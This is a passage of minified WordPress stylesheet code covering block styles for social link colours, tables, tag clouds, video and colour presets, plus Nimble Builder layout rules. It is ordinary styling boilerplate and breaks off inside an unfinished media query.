.wp-social-link-codepen{color:#1e1f26}.wp-block-social-links.is-style-logos-only .wp-social-link-deviantart{color:#02e49b}.wp-block-social-links.is-style-logos-only .wp-social-link-dribbble{color:#e94c89}.wp-block-social-links.is-style-logos-only .wp-social-link-dropbox{color:#4280ff}.wp-block-social-links.is-style-logos-only .wp-social-link-etsy{color:#f45800}.wp-block-social-links.is-style-logos-only .wp-social-link-facebook{color:#1778f2}.wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-flickr{color:#0461dd}.wp-block-social-links.is-style-logos-only .wp-social-link-foursquare{color:#e65678}.wp-block-social-links.is-style-logos-only .wp-social-link-github{color:#24292d}.wp-block-social-links.is-style-logos-only .wp-social-link-goodreads{color:#382110}.wp-block-social-links.is-style-logos-only .wp-social-link-google{color:#ea4434}.wp-block-social-links.is-style-logos-only .wp-social-link-instagram{color:#f00075}.wp-block-social-links.is-style-logos-only .wp-social-link-lastfm{color:#e21b24}.wp-block-social-links.is-style-logos-only .wp-social-link-linkedin{color:#0d66c2}.wp-block-social-links.is-style-logos-only .wp-social-link-mastodon{color:#3288d4}.wp-block-social-links.is-style-logos-only .wp-social-link-medium{color:#02ab6c}.wp-block-social-links.is-style-logos-only .wp-social-link-meetup{color:#f6405f}.wp-block-social-links.is-style-logos-only .wp-social-link-patreon{color:#ff424d}.wp-block-social-links.is-style-logos-only .wp-social-link-pinterest{color:#e60122}.wp-block-social-links.is-style-logos-only .wp-social-link-pocket{color:#ef4155}.wp-block-social-links.is-style-logos-only .wp-social-link-reddit{color:#ff4500}.wp-block-social-links.is-style-logos-only .wp-social-link-skype{color:#0478d7}.wp-block-social-links.is-style-logos-only .wp-social-link-snapchat{stroke:#000;color:#fff}.wp-block-social-links.is-style-logos-only .wp-social-link-soundcloud{color:#ff5600}.wp-block-social-links.is-style-logos-only .wp-social-link-spotify{color:#1bd760}.wp-block-social-links.is-style-logos-only .wp-social-link-telegram{color:#2aabee}.wp-block-social-links.is-style-logos-only .wp-social-link-threads,.wp-block-social-links.is-style-logos-only .wp-social-link-tiktok{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-tumblr{color:#011835}.wp-block-social-links.is-style-logos-only .wp-social-link-twitch{color:#6440a4}.wp-block-social-links.is-style-logos-only .wp-social-link-twitter{color:#1da1f2}.wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{color:#1eb7ea}.wp-block-social-links.is-style-logos-only .wp-social-link-vk{color:#4680c2}.wp-block-social-links.is-style-logos-only .wp-social-link-whatsapp{color:#25d366}.wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{color:#3499cd}.wp-block-social-links.is-style-logos-only .wp-social-link-x{color:#000}.wp-block-social-links.is-style-logos-only .wp-social-link-yelp{color:#d32422}.wp-block-social-links.is-style-logos-only .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}.wp-block-social-links.is-style-pill-shape .wp-social-link a{padding-left:.66667em;padding-right:.66667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}.wp-block-spacer{clear:both}.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud.alignfull{padding-left:1em;padding-right:1em}.wp-block-tag-cloud a{display:inline-block;margin-right:5px}.wp-block-tag-cloud span{display:inline-block;margin-left:5px;text-decoration:none}.wp-block-tag-cloud.is-style-outline{display:flex;flex-wrap:wrap;gap:1ch}.wp-block-tag-cloud.is-style-outline a{border:1px solid;font-size:unset!important;margin-right:0;padding:1ch 2ch;text-decoration:none!important}.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:transparent;border-bottom:1px solid #f0f0f0;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:transparent}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:currentColor}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:currentColor}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}:where(.wp-block-term-description){margin-bottom:var(--wp--style--block-gap);margin-top:var(--wp--style--block-gap)}.wp-block-term-description p{margin-bottom:0;margin-top:0}.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-left:0}.wp-block-text-columns .wp-block-column:last-child{margin-right:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.33333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}.wp-block-video{box-sizing:border-box}.wp-block-video video{vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video figcaption{margin-bottom:1em;margin-top:.5em}.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:left;text-indent:0}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}.has-text-align-center{text-align:center}.has-text-align-left{text-align:left}.has-text-align-right{text-align:right}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{clip:rect(1px,1px,1px,1px);word-wrap:normal!important;border:0;-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.screen-reader-text:focus{clip:auto!important;background-color:#ddd;-webkit-clip-path:none;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){border-right-style:solid}html :where([style*=border-bottom-color]){border-bottom-style:solid}html :where([style*=border-left-color]){border-left-style:solid}html :where([style*=border-width]){border-style:solid}html :where([style*=border-top-width]){border-top-style:solid}html :where([style*=border-right-width]){border-right-style:solid}html :where([style*=border-bottom-width]){border-bottom-style:solid}html :where([style*=border-left-width]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}} .wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em} /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--color--primary:#a80000;--wp--preset--color--secondary:#750000;--wp--preset--color--dark-gray:#111;--wp--preset--color--light-gray:#767676;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--font-size--small:19.5px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36.5px;--wp--preset--font-size--x-large:42px;--wp--preset--font-size--normal:22px;--wp--preset--font-size--huge:49.5px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem;--wp--preset--shadow--natural:6px 6px 9px rgba(0,0,0,.2);--wp--preset--shadow--deep:12px 12px 50px rgba(0,0,0,.4);--wp--preset--shadow--sharp:6px 6px 0px rgba(0,0,0,.2);--wp--preset--shadow--outlined:6px 6px 0px -3px rgba(255,255,255,1),6px 6px rgba(0,0,0,1);--wp--preset--shadow--crisp:6px 6px 0px rgba(0,0,0,1)}:where(.is-layout-flex){gap:.5em}:where(.is-layout-grid){gap:.5em}body .is-layout-flow>.alignleft{float:left;margin-inline-start:0;margin-inline-end:2em}body .is-layout-flow>.alignright{float:right;margin-inline-start:2em;margin-inline-end:0}body .is-layout-flow>.aligncenter{margin-left:auto !important;margin-right:auto !important}body .is-layout-constrained>.alignleft{float:left;margin-inline-start:0;margin-inline-end:2em}body .is-layout-constrained>.alignright{float:right;margin-inline-start:2em;margin-inline-end:0}body .is-layout-constrained>.aligncenter{margin-left:auto !important;margin-right:auto !important}body .is-layout-constrained>:where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width:var(--wp--style--global--content-size);margin-left:auto !important;margin-right:auto !important}body .is-layout-constrained>.alignwide{max-width:var(--wp--style--global--wide-size)}body .is-layout-flex{display:flex}body .is-layout-flex{flex-wrap:wrap;align-items:center}body .is-layout-flex>*{margin:0}body .is-layout-grid{display:grid}body .is-layout-grid>*{margin:0}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-grid){gap:2em}:where(.wp-block-post-template.is-layout-flex){gap:1.25em}:where(.wp-block-post-template.is-layout-grid){gap:1.25em}.has-black-color{color:var(--wp--preset--color--black) !important}.has-cyan-bluish-gray-color{color:var(--wp--preset--color--cyan-bluish-gray) !important}.has-white-color{color:var(--wp--preset--color--white) !important}.has-pale-pink-color{color:var(--wp--preset--color--pale-pink) !important}.has-vivid-red-color{color:var(--wp--preset--color--vivid-red) !important}.has-luminous-vivid-orange-color{color:var(--wp--preset--color--luminous-vivid-orange) !important}.has-luminous-vivid-amber-color{color:var(--wp--preset--color--luminous-vivid-amber) !important}.has-light-green-cyan-color{color:var(--wp--preset--color--light-green-cyan) !important}.has-vivid-green-cyan-color{color:var(--wp--preset--color--vivid-green-cyan) !important}.has-pale-cyan-blue-color{color:var(--wp--preset--color--pale-cyan-blue) !important}.has-vivid-cyan-blue-color{color:var(--wp--preset--color--vivid-cyan-blue) !important}.has-vivid-purple-color{color:var(--wp--preset--color--vivid-purple) !important}.has-black-background-color{background-color:var(--wp--preset--color--black) !important}.has-cyan-bluish-gray-background-color{background-color:var(--wp--preset--color--cyan-bluish-gray) !important}.has-white-background-color{background-color:var(--wp--preset--color--white) !important}.has-pale-pink-background-color{background-color:var(--wp--preset--color--pale-pink) !important}.has-vivid-red-background-color{background-color:var(--wp--preset--color--vivid-red) !important}.has-luminous-vivid-orange-background-color{background-color:var(--wp--preset--color--luminous-vivid-orange) !important}.has-luminous-vivid-amber-background-color{background-color:var(--wp--preset--color--luminous-vivid-amber) !important}.has-light-green-cyan-background-color{background-color:var(--wp--preset--color--light-green-cyan) !important}.has-vivid-green-cyan-background-color{background-color:var(--wp--preset--color--vivid-green-cyan) !important}.has-pale-cyan-blue-background-color{background-color:var(--wp--preset--color--pale-cyan-blue) !important}.has-vivid-cyan-blue-background-color{background-color:var(--wp--preset--color--vivid-cyan-blue) !important}.has-vivid-purple-background-color{background-color:var(--wp--preset--color--vivid-purple) !important}.has-black-border-color{border-color:var(--wp--preset--color--black) !important}.has-cyan-bluish-gray-border-color{border-color:var(--wp--preset--color--cyan-bluish-gray) !important}.has-white-border-color{border-color:var(--wp--preset--color--white) !important}.has-pale-pink-border-color{border-color:var(--wp--preset--color--pale-pink) !important}.has-vivid-red-border-color{border-color:var(--wp--preset--color--vivid-red) !important}.has-luminous-vivid-orange-border-color{border-color:var(--wp--preset--color--luminous-vivid-orange) !important}.has-luminous-vivid-amber-border-color{border-color:var(--wp--preset--color--luminous-vivid-amber) !important}.has-light-green-cyan-border-color{border-color:var(--wp--preset--color--light-green-cyan) !important}.has-vivid-green-cyan-border-color{border-color:var(--wp--preset--color--vivid-green-cyan) !important}.has-pale-cyan-blue-border-color{border-color:var(--wp--preset--color--pale-cyan-blue) !important}.has-vivid-cyan-blue-border-color{border-color:var(--wp--preset--color--vivid-cyan-blue) !important}.has-vivid-purple-border-color{border-color:var(--wp--preset--color--vivid-purple) !important}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background:var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background:var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background:var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background:var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background:var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important}.has-cool-to-warm-spectrum-gradient-background{background:var(--wp--preset--gradient--cool-to-warm-spectrum) !important}.has-blush-light-purple-gradient-background{background:var(--wp--preset--gradient--blush-light-purple) !important}.has-blush-bordeaux-gradient-background{background:var(--wp--preset--gradient--blush-bordeaux) !important}.has-luminous-dusk-gradient-background{background:var(--wp--preset--gradient--luminous-dusk) !important}.has-pale-ocean-gradient-background{background:var(--wp--preset--gradient--pale-ocean) !important}.has-electric-grass-gradient-background{background:var(--wp--preset--gradient--electric-grass) !important}.has-midnight-gradient-background{background:var(--wp--preset--gradient--midnight) !important}.has-small-font-size{font-size:var(--wp--preset--font-size--small) !important}.has-medium-font-size{font-size:var(--wp--preset--font-size--medium) !important}.has-large-font-size{font-size:var(--wp--preset--font-size--large) !important}.has-x-large-font-size{font-size:var(--wp--preset--font-size--x-large) !important}.wp-block-navigation a:where(:not(.wp-element-button)){color:inherit}:where(.wp-block-post-template.is-layout-flex){gap:1.25em}:where(.wp-block-post-template.is-layout-grid){gap:1.25em}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-grid){gap:2em}.wp-block-pullquote{font-size:1.5em;line-height:1.6} .sektion-wrapper *,.sektion-wrapper ::after,.sektion-wrapper ::before{box-sizing:border-box}.sektion-wrapper a,.sektion-wrapper abbr,.sektion-wrapper acronym,.sektion-wrapper address,.sektion-wrapper applet,.sektion-wrapper article,.sektion-wrapper aside,.sektion-wrapper audio,.sektion-wrapper b,.sektion-wrapper big,.sektion-wrapper blockquote,.sektion-wrapper canvas,.sektion-wrapper caption,.sektion-wrapper center,.sektion-wrapper cite,.sektion-wrapper code,.sektion-wrapper dd,.sektion-wrapper del,.sektion-wrapper details,.sektion-wrapper dfn,.sektion-wrapper dl,.sektion-wrapper dt,.sektion-wrapper em,.sektion-wrapper embed,.sektion-wrapper fieldset,.sektion-wrapper figcaption,.sektion-wrapper figure:not([class*=wp-block-]),.sektion-wrapper footer,.sektion-wrapper form,.sektion-wrapper h1,.sektion-wrapper h2,.sektion-wrapper h3,.sektion-wrapper h4,.sektion-wrapper h5,.sektion-wrapper h6,.sektion-wrapper header,.sektion-wrapper hgroup,.sektion-wrapper i,.sektion-wrapper iframe,.sektion-wrapper img,.sektion-wrapper ins,.sektion-wrapper kbd,.sektion-wrapper label,.sektion-wrapper legend,.sektion-wrapper li,.sektion-wrapper mark,.sektion-wrapper menu,.sektion-wrapper nav,.sektion-wrapper object,.sektion-wrapper ol,.sektion-wrapper output,.sektion-wrapper p,.sektion-wrapper pre,.sektion-wrapper q,.sektion-wrapper ruby,.sektion-wrapper s,.sektion-wrapper samp,.sektion-wrapper section,.sektion-wrapper small,.sektion-wrapper span,.sektion-wrapper strike,.sektion-wrapper strong,.sektion-wrapper sub,.sektion-wrapper summary,.sektion-wrapper sup,.sektion-wrapper table,.sektion-wrapper tbody,.sektion-wrapper td,.sektion-wrapper tfoot,.sektion-wrapper th,.sektion-wrapper thead,.sektion-wrapper time,.sektion-wrapper tr,.sektion-wrapper tt,.sektion-wrapper u,.sektion-wrapper ul,.sektion-wrapper var,.sektion-wrapper video{border:none;font-size:inherit;line-height:inherit;margin:0;padding:0}.sektion-wrapper blockquote::after,.sektion-wrapper blockquote::before,.sektion-wrapper q:after,.sektion-wrapper q:before{content:""}.sektion-wrapper ol,.sektion-wrapper ul{list-style:none}.sektion-wrapper img{max-width:100%;vertical-align:middle;border-style:none;display:inline}.sektion-wrapper svg:not(:root){overflow:hidden}.sektion-wrapper embed,.sektion-wrapper iframe,.sektion-wrapper object{max-width:100%}[data-sek-level=location]{clear:both;font-size:16px}.sek-column,.sek-module,.sek-section{display:flex;align-items:center}.sek-column-inner,.sek-module-inner{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.sek-column-inner{display:flex;flex-direction:column}.sek-module{align-self:center;width:100%;max-width:100%}[data-sek-is-nested=true] .sek-container-fluid{padding-right:0;padding-left:0}.sek-module-placeholder{text-align:center}.sek-module-placeholder .material-icons{font-size:inherit;color:#cfcfcf}.sek-screen-reader-text{border:0;clip:rect(0,0,0,0);height:1px;overflow:hidden;padding:0;position:absolute!important;width:1px;word-wrap:normal!important}#nimble-page{position:relative;word-wrap:break-word}#wpadminbar .sek-nimble-icon{display:inline-block}#wpadminbar .sek-nimble-icon img{width:28px;position:absolute;top:2px;-webkit-filter:grayscale(100%);filter:grayscale(100%);-webkit-filter:gray;filter:gray;-webkit-transition:all .3s ease-in-out;-moz-transition:all,.3s ease-in-out;-ms-transition:all,.3s ease-in-out;-o-transition:all,.3s ease-in-out;transition:all .3s ease-in-out;-webkit-box-shadow:none;box-shadow:none}#wpadminbar .sek-nimble-icon:hover img{-webkit-filter:none;filter:none;-webkit-filter:none;filter:none}#wpadminbar .sek-nimble-icon .sek-nimble-admin-bar-title{padding-left:30px}[data-sek-has-bg=true]{background-size:cover;background-repeat:no-repeat;background-position:50% 50%}[data-sek-level=location] [data-sek-bg-parallax=true]{background-attachment:fixed;background-size:cover}[data-sek-level=location] .sek-has-bg{position:relative}@supports (-webkit-overflow-scrolling:touch){body [data-sek-level=location] [data-sek-bg-fixed=true],body [data-sek-level=location] [data-sek-bg-parallax=true]{background-attachment:scroll}}[data-sek-level=location] [data-sek-level]{-webkit-transition:0s linear;-o-transition:0s linear;transition:0s linear;-webkit-transition-property:background-position;-o-transition-property:background-position;transition-property:background-position}.sek-module .sek-module-inner .alx-tab.thumbs-enabled>li{padding-left:94px}.sek-module .sek-module-inner .widget_hu_tabs ol,.sek-module .sek-module-inner .widget_hu_tabs ul{margin-left:0;margin-bottom:0}.sek-module .sek-module-inner .widget_hu_tabs .alx-tabs-nav{margin-bottom:10px}[data-sek-level].sek-level-has-shadow{-webkit-box-shadow:rgba(0,0,0,.25) 0 3px 11px 0;-moz-box-shadow:rgba(0,0,0,.25) 0 3px 11px 0;box-shadow:rgba(0,0,0,.25) 0 3px 11px 0}.customizer-preview [data-sek-level].sek-level-has-shadow{-webkit-box-shadow:rgba(0,0,0,.25) 0 3px 11px 0!important;-moz-box-shadow:rgba(0,0,0,.25) 0 3px 11px 0!important;box-shadow:rgba(0,0,0,.25) 0 3px 11px 0!important}[data-sek-level][data-sek-video-bg-src]{position:relative}[data-sek-level] embed,[data-sek-level] iframe,[data-sek-level] object,[data-sek-level] video{max-width:100%;width:100%;margin:0;line-height:1;border:none}[data-sek-level] .sek-custom-embed{line-height:0}[data-sek-level] .sek-background,[data-sek-level] .sek-bg-video-wrapper{height:100%;width:100%;top:0;left:0;position:absolute!important;overflow:hidden;z-index:0;direction:ltr}[data-sek-level] .sek-bg-video-wrapper{-webkit-transition:opacity .5s linear;-o-transition:opacity .5s linear;transition:opacity .5s linear;pointer-events:none;opacity:0}[data-sek-level] .sek-bg-video-wrapper.sek-bg-loading{opacity:0;visibility:hidden}[data-sek-level] .sek-background-vimeo-element,[data-sek-level] .sek-bg-youtube-video-wrapper{max-width:none}[data-sek-level] .sek-background-video-local,[data-sek-level] .sek-background-vimeo-element,[data-sek-level] .sek-bg-youtube-video-wrapper{position:absolute;top:50%;left:50%;-webkit-transform:translateX(-50%) translateY(-50%);-ms-transform:translateX(-50%) translateY(-50%);transform:translateX(-50%) translateY(-50%)}[data-sek-level] .sek-background-video-local{-o-object-fit:cover;object-fit:cover}.sek-module-inner .sek-debug-modules{margin:1em;padding:5px;border:1px solid rgba(221,221,221,.43);box-shadow:1px 1px 2px 0 rgba(75,75,85,.2);-webkit-box-shadow:1px 1px 2px 0 rgba(75,75,85,.2);background-color:#fff;font-size:15px;font-weight:400;color:#6d6d6d;background:rgba(255,255,255,.6)}@media (max-width:575px){.customizer-preview [data-sek-video-bg-on-mobile=false] .sek-bg-video-wrapper{display:none}}.sek-animate-candidate:not(.sek-animate-displayed-before-starting){opacity:0}.sek-overflow-hidden-while-animating{overflow:hidden}.nb-scroll-down #nimble-header:not(.sek-header-mobile-menu-expanded),.nb-scroll-up #nimble-header:not(.sek-header-mobile-menu-expanded){background-color:rgba(255,255,255,.9)}.mfp-wrap button.mfp-arrow,.mfp-wrap button.mfp-close{background:0 0!important;background:0 0!important}.mfp-wrap img.mfp-img{padding:40px 0 0}.mfp-wrap::after{bottom:20px}.mfp-wrap .mfp-bottom-bar{margin-top:0}.sek-module .sek-module-inner .sek-btn,.sek-service-font{font-family:sans-serif}.sek-container{width:100%;padding-right:10px;padding-left:10px;margin-right:auto;margin-left:auto}@media (min-width:576px){.sek-container{max-width:540px}}@media 